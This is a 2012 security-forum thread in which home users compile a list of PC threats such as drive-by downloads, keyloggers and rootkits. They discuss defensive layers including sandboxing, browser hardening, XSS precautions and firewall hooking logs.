My 1 and only philosophy thought for 2012!

Well realistically you could ditch the lot! IF! 1: You never visited anything bogus, and kept to just trusted websites, that are less likely to pose a threat, i.e news sites or sports sites etc.. 2: never downloaded anything that was compressed. 3: never opened bogus emails 4: just used common sense, then and only then if you stuck to those rules, you wouldnt need any security at all, but you're not likely to do that are you

 

You are 100% correct! Users are unlikely to do as you suggest.!


So parsing your post I find these threats:

1) visiting bogus web sites
2) news sites
3) sports sites
4) downloading compressed files
5) lack of common sense

Is this correct?

 

Version 2 of our threat list (Impacts not yet there)

Version 2 of the threat list Here is an update to orginal list

1. Drive by ??
2. Virus
3. Spyware
4. Existing infected filesSpam
5. Evil Websites
6. web surfing
7. adobe
8. old java versions
9. Scripting
10. Attempts to access your setup by hackers
11. Loss of private data
12. Hooking
13. memory injection
14. process termination
15. registry access
16. screen,clipboard logging
17. root kits
18. DNS request by non network enabled applications
19. Launch network enabled process
20. Keyboard logging/intercept keystrokes
21. Human Error in Security Decision(s)
22. visiting bogus web sites
23. news sites
24. sports sites
25. downloading compressed files
26. lack of common sense
27. malware
28. Tracking of Online Habits .
29. Unauthorized use of PC , e.g as part a botnet

 

Dont ask if this is too little.

I use Windows firewall control from Binisoft as my ONLY security application. Nothing else and I am running really great, lite and secure...

Common sense outmatch any other software than firewalls

 

Escalader - i can prevent this numbered issues only if i dont execute them.
it's impossible to control all in any way - so the focus will go away from
convenient browsing instead control those processes. thats waste of time and
energie. if something is fishy the last way out is a proper backup.

target of all attacks is the human nature - dullness and greenness - and biggest of all - nosiness
(if that are the right terms)

"gimme all news"
"all is harmless"
"i want that file"

 

Have a read at this again from earlier in the thread you will then remember that is NOT what was put as a question:

https://www.wilderssecurity.com/showpost.php?p=1997817&postcount=7

 

Yes, no problem.

Please note that no where (I hope did we say ALL threats).

BUT if we develop a list of say 50 of the most likely/common/dangerous threats and then match those up to our layers and ask "does our layer deal with this type of threat?" then IMHO we have done a reasonable evaluation of our layers. We don't need or want ALL just a reasonable caterorgized list as a functional review of our defenses.

It doesn't matter in this thread what tools inhabit each layer. My tools are not important to the thread only to my setup. The same applies to us all.

BUT if in the end you find that one of your layers is deficient against a threat well then again in my view that is valuable.

If thread followers have a different view or security policy that is fine then the thread is useless to them except to say those guys are wasting their time

None of that matters to me personally I'd be the first guy out of the gate to say yes you have your own view great well done, only it is not my view.

Okay?

 

add DLL Injection, Persistent Cookies

my way of handling most security threats:

* Set up my pc to deny execution without my consent.
* when executing make sure it is sandboxed/contained.

 

Escalader,
Could you qualify the term "secure" a bit? Secure against who or what? For how long? Depending on your potential adversary, what is secure against one is a minor inconvenience to another. All threats is quite vague, especially if that includes "official snooping".

 

You are right to ask this.

I've not emphasized that word secure since I think everybody has different views of what "security" is needed for themselves. (and sometime others)

What is one persons secure method would be a major inconvenience to another user. I'm sure we have all seen signatures that hint at this one.
"the only safe setup is unplugged from the www" .But another guy might say that is wrong, since my PC can be stolen and all my private information lost. In my view (I'm often wrong) both these are correct.

So what I'm saying here is a roundabout way of saying rather than argue or debate the words I choose to take a lets identify the threats we face.

If say I don't see USB's from the teenagers as a threat then that one would be excluded from my "threat" list. You may choose to include it.

But if you have your list and I have mine then we can both "test" the adequacy of your defences against our own lists. We don't need to agree on the one and only list in fact that is a a bad idea.


I've probably made it worse with all this

 

I've added them!

Hold on to your remedies for the moment! (I like both of them!)

 

Escalader - its no waste to think about security. but some dudes investigate lot of time into control which cannot be controlled. and in first this is "your" thread cause it starts with "My..." you collect a list of possibilities and i gave you my thoughts. what i actually miss is the conclusion of it - ot ist that part of another thread? (although - it has lot of threads here concerning vulnerabilities ) from my point there is a small amount of switches to cover most of the (your) list - but if you want all you have to be a hacker or a pro. i dont have that knowledge - i even was set up with torchsoft malware defender at least cause it got annoying. same for outpost 7 (all after v5) as example.

USB was mentioned - quite easy - turn off all autostart switches and tell sandboxie or bufferzone to open such drives in the box. same for unknown software

drive-by (browsing) - dont surf such sites - use eg. WOT.
but WOT does not cover all, so defeat adverts and popup
those cannot prevent evil combinations of eg. javascript+java, so disable java

another switch is LUA

aso.

those are elementary for safer working and cover most items on your list. ofc its annoying to rewind that text again and again but has to be. people must be concious that not anti-xyz software is the holy bible versus malware. additional software only feigns security but it only covers which is already known - not the new samples - 15000 a day. people need to go back to the roots instead adding intrusion forkes.

last days i had two people again with some problems browsing or system trouble they cant explain. they gave me a hijackthis log and although the symptoms are different both had same issue: gamemon.des.exe (file missing)
this is a track of a trojan. and the rest of the logfile explained why they got it - they loaded it themselves while using illegal stuff - while avira and norton kept silent. only one story.

if you feel bored again now... may be

 

Hi B!

Nope never bored by your stuff!

TY for giving me a few more threats for the list.

It must drive you nuts and others the way I work/think but there is no cure for that.

If it helps at all let me say more clearly I'm aiming for a solid sample of threats for the list. Say 50 or so.

Then I'll post a table where I try to categorize these for the thread. I will make errors doing that ( I'm used to flak)

Then when that is done we will match these up to the conceptual layers.

At that point the mitigation can start getting added!

It's like watching grass grow. But I have zero sense of urgency here and I'm NOT peddling tools ever! I have zero loyalty to vendors.

 

@Escalader,

I recommend, if you haven't already, check out several posts/threads by Wilders member Rmus. He continually - and correctly - asserts the importance of hardening the browser, because this is, after all, the main "gateway" for all exploits and threats. If you stop the threat at the browser, you stop it from gaining any kind of foothold in the O/S.

You have listed numerous threats, which is fine, but some are too generalized. Probably two of the main web-based threats are Cross Site Scripting and Drive-by Downloads. There may be others, but from what I've researched so far, these two seem to be amongst the most serious because stopping them outright isn't necessarily completely in the hands of the user.

From what I've found so far:

Five ways to reduce the chances of an XSS attack on the client-side:

• Disable scripting when it is not required –Possible browser choices: Firefox w/NoScript or IE 8/9 (has built-in XSS filtering)
• Do not trust links to other sites on e-mail or message boards: They may contain malicious code with damaging potential.
• Do not follow links from sites that lead to security-sensitive pages involving personal or business information unless you specifically trust them.
• Access any site involving sensitive information directly through its address and not through any third-party sites.
• Get a list of attacks and the sites and boards they happened on and be careful if you need to visit one of them.

Drive-by Download Protection:

• Keep all software updated
• Minimize attack surface: uninstall software and add-ons that are not used and/or not necessary. This will reduce the attack surface and simplify the amount of software you need to keep up to date on your systems. Disable unneeded software that can’t be uninstalled.
• Newer software is better: the data suggests attackers are more successful when targeting older platforms, Web browsers and document parsers. Where possible use the most recent versions of operating systems, browsers, document parsers, etc.
• Use caution surfing: be selective about what Web sites you decide to connect to, and restrict the sites that corporate assets can connect to. Avoid surfing the Internet while logged onto systems as an Administrator – use accounts that have limited privileges like a standard user account.
• Careful who you talk to online: be selective about the emails you open, the instant messages you interact with and the URLs you click on.
• Use anti-malware software: run anti-malware software from a trusted vendor and keep it up to date. –Optional (IMO): I prefer on-demand antivirus only, but this is of course a user's preference
• Use web browser and search protections: leverage the protection technologies that are available in modern Web browsers and search engines. For example, the SmartScreen Filter built into Internet Explorer helps protect against sites known to distribute malware by blocking navigation to malicious sites or downloads. Anti-malware protection helps prevent the download of harmful software. Internet Explorer 8 added per-site ActiveX controls, which allowed users to restrict an ActiveX plug-in to one particular domain. Internet Explorer 9 introduces ActiveX Filtering, which provides users with more control over which sites can use ActiveX controls; when ActiveX Filtering is enabled, only sites that are trusted by users can run ActiveX controls. This feature reduces the attack surface by restricting the ability to run ActiveX components to trusted sites. Users can allow specific sites to run ActiveX controls through an icon in the address bar. IT administrators can also enable ActiveX Filtering via Group Policy to prevent users from downloading ActiveX controls from the Internet Zone.

Some alternative browser choices:

• Firefox: Used with NoScript can provide powerful protection against web-based exploits
  
• Chrome: Safe Browsing, Sandboxing, Auto-updates
• Opera: Fraud and Malware Protection, Encryption, Private Tabs

The above information has been obtained and in some cases edited from the following sources:

-http://www.ibm.com/developerworks/web/library/wa-secxss/
-http://blogs.technet.com/b/security/archive/2011/12/12/what-you-should-know-about-drive-by-download-attacks-part-2.aspx
-http://www.google.co.uk/chrome/intl/en/more/security.html
-http://www.opera.com/security/

 

@wat - thx for pointing out the advantages of IE8 & 9.
i'm stil on IE8 but it has only lan access - and other computers wont let him in if not allowed

@Escalader

not really - you doint waste my timenor am i surprised or worried.
from time to time i feel this way and i think here is the right audience for

i like your list, really - it remembers my beginning and still learning way with security.
my nearest friends have adopted some or my thoughts and they drive really
good with them. so thats some kind of satisfaction

pls go further.

 

Hello:

Thanks very much! For each of the mitigation you have provided there are threats either directly listed or implied!

My list needs some parsing, I know that. Some are general as you say, others need clarification.

I really appreciate it!

 

Okay I am proceeding on. I need all the help I can get.

 

Hello Thread:

Here is my first stab at some classification columns for our evolving threat list.

1. Type,
2. Threat,
3. Threat Methods/ Cause,
4. Examples,
5. Potential Impacts,
6. Mitigation (layers)

Let me know what you all recommend for the classifications

 

Hello Thread!

Okay, good since 3 days ago about 150 or so reads/views of Version 1 classification system for threats.

So for now I'll assume that most of you guys/gals are willing to try those for now.

Here is a small question for you:

Are the following ALLOWED HOOKING events (from log entries from my Firewall) threats I have failed to manage?

1. IEXPLORE.EXE Window hooking c:\windows\system32\mshtml.dll
2. IDENTITIES.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
3. FOXIT UPDATER.EXE Window hooking c:\windows\syswow64\msctf.dll
4. IEXPLORE.EXE Window hooking c:\windows\system32\dwmapi.dll
5. EXPLORER.EXE Window hooking c:\program files (x86)\keyscrambler\x64\keyscramblerie.dll
6. KEYSCRAMBLER.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
7. LOGONUI.EXE Window hooking c:\windows\system32\msctf.dll